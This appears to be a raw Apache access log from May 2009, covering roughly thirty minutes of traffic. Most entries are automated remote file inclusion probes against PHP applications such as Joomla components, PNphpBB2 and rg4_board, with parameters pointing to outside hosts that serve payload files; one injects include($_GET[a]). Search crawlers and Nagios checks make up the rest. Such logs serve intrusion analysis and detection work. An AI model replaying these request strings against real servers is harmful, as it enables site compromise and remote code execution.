218.246.20.221 - - [17/May/2009:04:30:21 -0400] "GET /logs///skin/zero_vote/setup.php?dir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
218.246.20.221 - - [17/May/2009:04:30:21 -0400] "GET /logs/access_log.Q108122100///skin/zero_vote/setup.php?dir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.246.20.221 - - [17/May/2009:04:30:35 -0400] "GET /logs/access_log.Q109050700///skin/zero_vote/setup.php?dir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
67.15.206.26 - - [17/May/2009:04:31:58 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
67.15.206.26 - - [17/May/2009:04:31:58 -0400] "GET /logs/access_log.Q108111500//components/com_flyspray/startdown.php?file=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
67.15.206.26 - - [17/May/2009:04:31:58 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:32:01 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:32:02 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:32:02 -0400] "GET /logs/access_log.Q108122500%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.12.31.79 - - [17/May/2009:04:32:02 -0400] "GET /phplive/setup/header.php?css_path=http://dmgxp.com/c? HTTP/1.1" 404 222 "-" "libwww-perl/5.810"
94.198.214.29 - - [17/May/2009:04:32:04 -0400] "GET /logs/access_log.Q108111500//components/com_flyspray/startdown.php?file=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 263 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
94.198.214.29 - - [17/May/2009:04:32:04 -0400] "GET //components/com_flyspray/startdown.php?file=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
67.15.206.26 - - [17/May/2009:04:32:18 -0400] "GET /logs/access_log.Q109022600//components/com_flyspray/startdown.php?file=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:32:22 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:32:22 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
94.198.214.29 - - [17/May/2009:04:32:25 -0400] "GET /logs/access_log.Q108111500//components/com_flyspray/startdown.php?file=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
94.198.214.29 - - [17/May/2009:04:32:26 -0400] "GET //components/com_flyspray/startdown.php?file=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
123.143.98.5 - - [17/May/2009:04:32:26 -0400] "GET /logs/access_log.Q108122500%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
94.198.214.29 - - [17/May/2009:04:32:26 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
123.143.98.5 - - [17/May/2009:04:32:31 -0400] "GET /logs/access_log.Q108082900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:04:32:52 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.143.98.5 - - [17/May/2009:04:32:54 -0400] "GET /logs/access_log.Q108082900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.29.190 - - [17/May/2009:04:33:05 -0400] "GET /logs/access_log.Q108111500//components/com_flyspray/startdown.php?file=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 263 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
217.147.29.190 - - [17/May/2009:04:33:06 -0400] "GET //components/com_flyspray/startdown.php?file=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
217.147.29.190 - - [17/May/2009:04:33:27 -0400] "GET /logs/access_log.Q108111500//components/com_flyspray/startdown.php?file=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.808"
217.147.29.190 - - [17/May/2009:04:33:27 -0400] "GET //components/com_flyspray/startdown.php?file=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.808"
217.147.29.190 - - [17/May/2009:04:33:28 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.808"
94.198.214.29 - - [17/May/2009:04:33:40 -0400] "GET //components/com_flyspray/startdown.php?file=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
67.15.206.26 - - [17/May/2009:04:33:59 -0400] "GET /logs/access_log.Q108111500%20%20//components/com_flyspray/startdown.php?file=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
67.15.206.26 - - [17/May/2009:04:34:13 -0400] "GET /logs/access_log.Q109022600%20%20//components/com_flyspray/startdown.php?file=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
217.147.29.190 - - [17/May/2009:04:34:17 -0400] "GET //components/com_flyspray/startdown.php?file=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.808"
65.55.106.217 - - [17/May/2009:04:35:03 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.198.214.29 - - [17/May/2009:04:35:11 -0400] "GET /logs/access_log.Q109022600//components/com_flyspray/startdown.php?file=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 263 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
65.55.106.217 - - [17/May/2009:04:36:11 -0400] "GET /logs/access_log.Q107073000 HTTP/1.1" 404 224 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
217.147.29.190 - - [17/May/2009:04:36:18 -0400] "GET /logs/access_log.Q109022600//components/com_flyspray/startdown.php?file=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 263 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
94.198.214.29 - - [17/May/2009:04:36:53 -0400] "GET /logs/access_log.Q109022600//components/com_flyspray/startdown.php?file=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
217.147.29.190 - - [17/May/2009:04:37:52 -0400] "GET /logs/access_log.Q109022600//components/com_flyspray/startdown.php?file=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.808"
209.59.12.99 - - [17/May/2009:04:37:52 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.139.104.104 - - [17/May/2009:04:38:47 -0400] "GET /logs/access_log.Q108122900///?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
221.139.104.104 - - [17/May/2009:04:38:47 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 200 1692 "-" "libwww-perl/5.805"
203.22.204.193 - - [17/May/2009:04:38:51 -0400] "GET /logs/access_log.Q108082800/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.76"
203.22.204.193 - - [17/May/2009:04:38:51 -0400] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.76"
203.22.204.193 - - [17/May/2009:04:38:51 -0400] "GET /logs/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.76"
203.22.204.193 - - [17/May/2009:04:40:29 -0400] "GET /logs/access_log.Q108082900/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.76"
123.143.98.5 - - [17/May/2009:04:41:52 -0400] "GET /logs/access_log.Q108122500//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:42:01 -0400] "GET /logs/access_log.Q108082900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:42:02 -0400] "GET /logs/access_log.Q108122500//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:42:18 -0400] "GET /logs/access_log.Q108082900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.19.228.18 - - [17/May/2009:04:42:48 -0400] "GET ///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
67.19.228.18 - - [17/May/2009:04:42:48 -0400] "GET /logs///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
67.19.228.18 - - [17/May/2009:04:42:50 -0400] "GET ///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
67.19.228.18 - - [17/May/2009:04:42:50 -0400] "GET /logs///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
67.19.228.18 - - [17/May/2009:04:42:50 -0400] "GET /logs/access_log.Q108100900///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
67.19.228.18 - - [17/May/2009:04:42:51 -0400] "GET /logs/access_log.Q108100900///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:04:42:52 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.19.228.18 - - [17/May/2009:04:42:58 -0400] "GET ///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
67.19.228.18 - - [17/May/2009:04:42:58 -0400] "GET /logs///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
67.19.228.18 - - [17/May/2009:04:42:58 -0400] "GET /logs/access_log.Q108100900///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:43:20 -0400] "GET /logs/access_log.Q108112400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:43:38 -0400] "GET /logs/access_log.Q108112400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:44:16 -0400] "GET /logs//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 1691 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:44:16 -0400] "GET /logs/access_log.Q108122100//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:44:17 -0400] "GET //?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:44:35 -0400] "GET //?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:44:35 -0400] "GET /logs/access_log.Q108122100//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:44:35 -0400] "GET /logs//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 1691 "-" "Mozilla/5.0"
116.127.123.13 - - [17/May/2009:04:45:11 -0400] "GET /logs/access_log.Q108082800/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
116.127.123.13 - - [17/May/2009:04:45:11 -0400] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
116.127.123.13 - - [17/May/2009:04:45:12 -0400] "GET /logs/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
67.19.228.18 - - [17/May/2009:04:45:45 -0400] "GET /logs/access_log.Q108100900%20%20///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
67.19.228.18 - - [17/May/2009:04:45:56 -0400] "GET /logs/access_log.Q108100900%20%20///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
72.30.79.49 - - [17/May/2009:04:46:21 -0400] "GET /logs/access_log.Q108081100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.19.228.18 - - [17/May/2009:04:46:33 -0400] "GET /logs/access_log.Q108100900%20%20///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
203.22.204.193 - - [17/May/2009:04:46:38 -0400] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.76"
209.59.12.99 - - [17/May/2009:04:47:52 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
116.127.123.13 - - [17/May/2009:04:49:14 -0400] "GET /logs/access_log.Q108082900/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
67.15.177.55 - - [17/May/2009:04:51:48 -0400] "GET /logs//index.php?load=http://www.kenniscentrumgemeenten.nl//assets/export/id.txt??%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
67.15.177.55 - - [17/May/2009:04:51:48 -0400] "GET /logs/access_log.Q109020700//index.php?load=http://www.kenniscentrumgemeenten.nl//assets/export/id.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
67.15.177.55 - - [17/May/2009:04:51:48 -0400] "GET //index.php?load=http://www.kenniscentrumgemeenten.nl//assets/export/id.txt??%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
67.15.177.55 - - [17/May/2009:04:51:48 -0400] "GET /logs/access_log.Q109022700//index.php?load=http://www.kenniscentrumgemeenten.nl//assets/export/id.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
209.59.12.99 - - [17/May/2009:04:52:53 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.143.98.5 - - [17/May/2009:04:53:06 -0400] "GET /logs/access_log.Q108122100%20%20//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:53:36 -0400] "GET /logs/access_log.Q108122100%20%20//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
116.127.123.13 - - [17/May/2009:04:54:29 -0400] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
124.217.216.86 - - [17/May/2009:04:57:19 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
124.217.216.86 - - [17/May/2009:04:57:19 -0400] "GET /logs/access_log.Q108100900/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
124.217.216.86 - - [17/May/2009:04:57:19 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
124.217.216.86 - - [17/May/2009:04:57:22 -0400] "GET /logs/access_log.Q108082900/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
122.153.212.195 - - [17/May/2009:04:57:33 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
121.254.229.131 - - [17/May/2009:04:57:35 -0400] "GET /logs//include/rg4_board/list.php?bbs_code=admin=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
121.254.229.131 - - [17/May/2009:04:57:35 -0400] "GET /logs/access_log.Q109020600%20%20//include/rg4_board/list.php?bbs_code=admin=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
121.254.229.131 - - [17/May/2009:04:57:35 -0400] "GET //include/rg4_board/list.php?bbs_code=admin=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
122.153.212.195 - - [17/May/2009:04:57:42 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
89.187.131.186 - - [17/May/2009:04:57:42 -0400] "GET /logs/access_log.Q109020600//include/rg4_board/view.php?bbs_code=http://208.98.22.241/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
89.187.131.186 - - [17/May/2009:04:57:42 -0400] "GET //include/rg4_board/view.php?bbs_code=http://208.98.22.241/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
89.187.131.186 - - [17/May/2009:04:57:42 -0400] "GET /logs//include/rg4_board/view.php?bbs_code=http://208.98.22.241/id.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
122.153.212.195 - - [17/May/2009:04:57:47 -0400] "GET /logs/access_log.Q108100900/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:04:57:53 -0400] "GET /logs/access_log.Q108100900/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:04:57:53 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:04:57:54 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
121.254.229.131 - - [17/May/2009:04:57:57 -0400] "GET /logs/access_log.Q109020600//include/rg4_board/list.php?bbs_code=admin=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
122.153.212.195 - - [17/May/2009:04:58:01 -0400] "GET /logs/access_log.Q108082900/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
116.50.163.164 - - [17/May/2009:04:58:57 -0400] "GET /logs//include/rg4_board/view.php?bbs_code=http://208.98.22.241/id.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
116.50.163.164 - - [17/May/2009:04:58:57 -0400] "GET /logs/access_log.Q109020600//include/rg4_board/view.php?bbs_code=http://208.98.22.241/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
116.50.163.164 - - [17/May/2009:04:58:57 -0400] "GET //include/rg4_board/view.php?bbs_code=http://208.98.22.241/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
211.241.40.51 - - [17/May/2009:04:59:00 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:04:59:00 -0400] "GET /logs/access_log.Q108100900/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:04:59:00 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
217.13.127.95 - - [17/May/2009:04:59:05 -0400] "GET //include/rg4_board/list.php?bbs_code=admin=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
217.13.127.95 - - [17/May/2009:04:59:05 -0400] "GET /logs//include/rg4_board/list.php?bbs_code=admin=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
217.13.127.95 - - [17/May/2009:04:59:06 -0400] "GET /logs/access_log.Q109020600%20%20//include/rg4_board/list.php?bbs_code=admin=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
217.13.127.95 - - [17/May/2009:04:59:06 -0400] "GET /logs/access_log.Q109020600%20%20//include/rg4_board/list.php?bbs_code=admin=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
217.13.127.95 - - [17/May/2009:04:59:06 -0400] "GET /logs//include/rg4_board/list.php?bbs_code=admin=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
217.13.127.95 - - [17/May/2009:04:59:06 -0400] "GET //include/rg4_board/list.php?bbs_code=admin=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
118.45.190.166 - - [17/May/2009:05:00:49 -0400] "GET //index.php?load=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
118.45.190.166 - - [17/May/2009:05:00:49 -0400] "GET /logs//index.php?load=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
118.45.190.166 - - [17/May/2009:05:00:49 -0400] "GET /logs/access_log.Q109020700%20%20//index.php?load=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
118.45.190.166 - - [17/May/2009:05:00:55 -0400] "GET /logs/access_log.Q109022700%20%20//index.php?load=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.217.216.86 - - [17/May/2009:05:01:05 -0400] "GET /logs/access_log.Q108100900%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
124.217.216.86 - - [17/May/2009:05:01:05 -0400] "GET /logs/access_log.Q108082900%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
72.30.79.49 - - [17/May/2009:05:01:37 -0400] "GET /logs/error_log.Q107072800 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.72.114 - - [17/May/2009:05:01:56 -0400] "GET /logs/error_log.Q108061400 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [17/May/2009:05:01:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.181.7.97 - - [17/May/2009:05:02:22 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
